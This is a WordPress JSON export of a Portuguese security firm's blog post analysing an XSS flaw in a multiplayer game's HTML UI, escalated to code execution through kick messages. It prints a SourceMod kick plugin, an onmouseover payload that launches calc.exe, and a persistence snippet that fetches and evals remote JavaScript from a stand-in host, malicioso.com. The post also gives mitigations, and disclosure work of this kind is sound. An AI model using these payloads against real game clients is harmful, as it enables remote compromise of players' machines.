{"id":159,"date":"2025-02-10T18:27:41","date_gmt":"2025-02-10T18:27:41","guid":{"rendered":"https:\/\/fikresekhel.com\/blog\/?p=159"},"modified":"2025-02-10T18:27:43","modified_gmt":"2025-02-10T18:27:43","slug":"analise-tecnica-avancada-xss-no-ui-de-jogo-multiplayer-levando-a-execucao-remota-de-codigo-rce","status":"publish","type":"post","link":"https:\/\/fikresekhel.com\/blog\/nossos-cases\/analise-tecnica-avancada-xss-no-ui-de-jogo-multiplayer-levando-a-execucao-remota-de-codigo-rce\/","title":{"rendered":"An\u00e1lise T\u00e9cnica Avan\u00e7ada: XSS no UI de Jogo Multiplayer Levando \u00e0 Execu\u00e7\u00e3o Remota de C\u00f3digo (RCE)"},"content":{"rendered":"\n

Resumo T\u00e9cnico<\/strong><\/h2>\n\n\n\n

Uma vulnerabilidade cr\u00edtica foi descoberta em um jogo multiplayer de uma startup internacional<\/strong>, explorando sua interface UI baseada em HTML\/CSS\/JS<\/strong>. O ataque permitia que um advers\u00e1rio inje\u00e7\u00f5esse c\u00f3digo HTML e JavaScript malicioso<\/strong>, resultando em execu\u00e7\u00e3o remota de c\u00f3digo (RCE)<\/strong> atrav\u00e9s de uma falha no processamento de mensagens de desconex\u00e3o.<\/p>\n\n\n\n

A explora\u00e7\u00e3o se deu por meio do atributo <\/strong>html=\"true\"<\/strong><\/code> em um componente da UI, permitindo a execu\u00e7\u00e3o arbitr\u00e1ria de c\u00f3digo JavaScript e sua persist\u00eancia no ambiente do jogo. Isso possibilitava comprometer clientes remotamente<\/strong> ao for\u00e7\u00e1-los a interagir com mensagens de kick contendo payloads maliciosos.<\/p>\n\n\n\n

\n\n\n\n

Detalhamento da Vulnerabilidade<\/strong><\/h2>\n\n\n\n

A falha ocorre na renderiza\u00e7\u00e3o da interface do jogo, permitindo que entrada controlada por usu\u00e1rios seja interpretada como c\u00f3digo HTML v\u00e1lido<\/strong>. O erro se origina do seguinte trecho de c\u00f3digo encontrado no arquivo de layout da interface:<\/p>\n\n\n\n

<Label html=\"true\" text=\"&lt;span class='chat-entry__name'&gt;{s:player_name}&lt;\/span&gt; {s:msg}\" acceptsinput=\"true\" \/><\/code><\/pre>\n\n\n\n
Esse Label<\/strong>, com html=\"true\"<\/code>, faz com que qualquer texto inserido na vari\u00e1vel {s:msg}<\/code> seja interpretado como HTML. Isso abre caminho para inje\u00e7\u00e3o de c\u00f3digo arbitr\u00e1rio<\/strong>.<\/p>\n\n\n\n
A explora\u00e7\u00e3o completa foi encontrada em outro arquivo layout\/popups\/popup_generic.xml<\/code>, onde o mesmo erro se repetia no contexto de mensagens de desconex\u00e3o:<\/p>\n\n\n\n
<Label html=\"true\" text=\"{s:disconnect_message}\" \/><\/code><\/pre>\n\n\n\n
Essa falha permitia que um atacante enviasse mensagens de kick contendo c\u00f3digo JavaScript<\/strong> e que fosse interpretado automaticamente no cliente da v\u00edtima.<\/p>\n\n\n\n
\n\n\n\n
Explora\u00e7\u00e3o – PoC (Proof of Concept)<\/strong><\/h2>\n\n\n\n
A explora\u00e7\u00e3o foi confirmada em um servidor dedicado customizado<\/strong>. Para explorar a vulnerabilidade, um atacante poderia configurar um servidor do jogo e for\u00e7ar a execu\u00e7\u00e3o remota do c\u00f3digo malicioso atrav\u00e9s de uma mensagem de kick customizada:<\/p>\n\n\n\n
1. C\u00f3digo do Plugin Malicioso para o Servidor<\/strong><\/h3>\n\n\n\n
#include <sourcemod>\n\n#pragma semicolon 1\n#pragma newdecls required\n\npublic void OnPluginStart()\n{\n    RegConsoleCmd(\"sm_testkick\", Cmd_Kick);\n}\n\npublic Action Cmd_Kick(int client, int args)\n{\n    if (args <= 0) {\n        PrintToChat(client, \"No arguments provided - Usage: !testkick <Kick Message>\");\n        return Plugin_Handled;\n    }\n\n    char full[5120];\n    GetCmdArgString(full, sizeof(full));\n\n    for (int i = 0; i < 5; i++) {\n        KickClient(client, full);\n    }\n    return Plugin_Handled;\n}<\/code><\/pre>\n\n\n\n
Este c\u00f3digo permite que qualquer mensagem seja injetada no kick do jogador<\/strong>, inclusive um payload XSS.<\/p>\n\n\n\n
2. Enviando o Payload para Explora\u00e7\u00e3o<\/strong><\/h3>\n\n\n\n
sm_testkick <a onmouseover=\"javascript:SteamOverlayAPI.OpenExternalBrowserURL('file:\/\/C:\/Windows\/System32\/calc.exe')\">The remote host stopped receiving communications and closed the connection<\/a><\/code><\/pre>\n\n\n\n
O comando acima for\u00e7a a v\u00edtima a executar calc.exe<\/strong><\/code> ao passar o mouse sobre a mensagem.<\/p>\n\n\n\n
3. Criando um Ataque Persistente<\/strong><\/h3>\n\n\n\n
Para manter o controle sobre o cliente comprometido, o atacante poderia utilizar fun\u00e7\u00f5es ass\u00edncronas da UI<\/strong>, como $.Schedule()<\/code> e $.AsyncWebRequest()<\/code>, para estabelecer um canal remoto persistente:<\/p>\n\n\n\n
$.Schedule(1, function() {\n    eval(\"$.AsyncWebRequest('http:\/\/malicioso.com\/payload.js', {complete: function(res) { eval(res); }});\");\n});<\/code><\/pre>\n\n\n\n
Isso permitiria ao atacante executar c\u00f3digo arbitr\u00e1rio continuamente<\/strong> no ambiente da v\u00edtima, transformando o exploit em um botnet de clientes infectados<\/strong>.<\/p>\n\n\n\n
\n\n\n\n
Impacto da Vulnerabilidade<\/strong><\/h2>\n\n\n\n
\ud83d\udea8 Execu\u00e7\u00e3o Remota de C\u00f3digo (RCE):<\/strong> A falha possibilita que c\u00f3digo JavaScript arbitr\u00e1rio seja executado no cliente.<\/p>\n\n\n\n
\ud83d\udea8 Comprometimento Total do Sistema:<\/strong> Utilizando a API do jogo, um atacante pode explorar caminhos locais do sistema para executar bin\u00e1rios arbitr\u00e1rios.<\/p>\n\n\n\n
\ud83d\udea8 Botnet de Jogadores:<\/strong> Atacantes podem utilizar eval()<\/code> e $.AsyncWebRequest()<\/code> para manter conex\u00e3o remota persistente com m\u00faltiplos clientes infectados<\/strong>.<\/p>\n\n\n\n
\ud83d\udea8 Engenharia Social:<\/strong> O ataque pode ser disfar\u00e7ado como uma mensagem de banimento falso, for\u00e7ando os usu\u00e1rios a interagir com a mensagem.<\/p>\n\n\n\n
\n\n\n\n
Mitiga\u00e7\u00f5es e Recomenda\u00e7\u00f5es<\/strong><\/h2>\n\n\n\n
\u2714\ufe0f Remo\u00e7\u00e3o do Atributo <\/strong>html=\"true\"<\/strong><\/code> de todas as interfaces UI do jogo.<\/p>\n\n\n\n
\u2714\ufe0f Sanitiza\u00e7\u00e3o de Entrada:<\/strong> Implementar fun\u00e7\u00f5es de escape para evitar execu\u00e7\u00e3o arbitr\u00e1ria de HTML dentro da interface do jogo.<\/p>\n\n\n\n
\u2714\ufe0f Restri\u00e7\u00e3o de Fun\u00e7\u00f5es Sens\u00edveis:<\/strong> APIs como OpenExternalBrowserURL()<\/code> devem exigir permiss\u00f5es expl\u00edcitas para execu\u00e7\u00e3o.<\/p>\n\n\n\n
\u2714\ufe0f Monitoramento de Anomalias:<\/strong> Implementar logs e detec\u00e7\u00e3o de atividades suspeitas em servidores do jogo.<\/p>\n\n\n\n
\u2714\ufe0f Treinamento de Administradores:<\/strong> Para evitar a instala\u00e7\u00e3o de plugins maliciosos em servidores comunit\u00e1rios.<\/p>\n\n\n\n
\n\n\n\n
Conclus\u00e3o<\/strong><\/h2>\n\n\n\n
Esta explora\u00e7\u00e3o da interface UI de um jogo multiplayer<\/strong> demonstra como vulnerabilidades XSS podem ser escaladas para ataques de execu\u00e7\u00e3o remota de c\u00f3digo (RCE)<\/strong>. O ataque explorou a inje\u00e7\u00e3o de c\u00f3digo HTML em mensagens de desconex\u00e3o<\/strong>, permitindo a um atacante comprometer completamente clientes conectados a um servidor malicioso.<\/p>\n\n\n\n
Refor\u00e7amos a import\u00e2ncia de pr\u00e1ticas seguras de codifica\u00e7\u00e3o para evitar ataques semelhantes em aplica\u00e7\u00f5es que utilizam frameworks baseados em HTML\/CSS\/JS.<\/strong><\/p>\n\n\n\n
\ud83d\udd39 Seu jogo est\u00e1 protegido contra ataques XSS avan\u00e7ados?<\/strong><\/p>\n\n\n\n
\ud83d\udd39\u00a0Entre em contato e agende uma auditoria de seguran\u00e7a com nossos especialistas!<\/strong>\u00a0<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Resumo T\u00e9cnico Uma vulnerabilidade cr\u00edtica foi descoberta em […]<\/p>\n","protected":false},"author":1,"featured_media":160,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24],"tags":[],"class_list":["post-159","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-nossos-cases"],"_links":{"self":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/159","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/comments?post=159"}],"version-history":[{"count":1,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/159\/revisions"}],"predecessor-version":[{"id":161,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/posts\/159\/revisions\/161"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/media\/160"}],"wp:attachment":[{"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/media?parent=159"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/categories?post=159"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fikresekhel.com\/blog\/wp-json\/wp\/v2\/tags?post=159"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}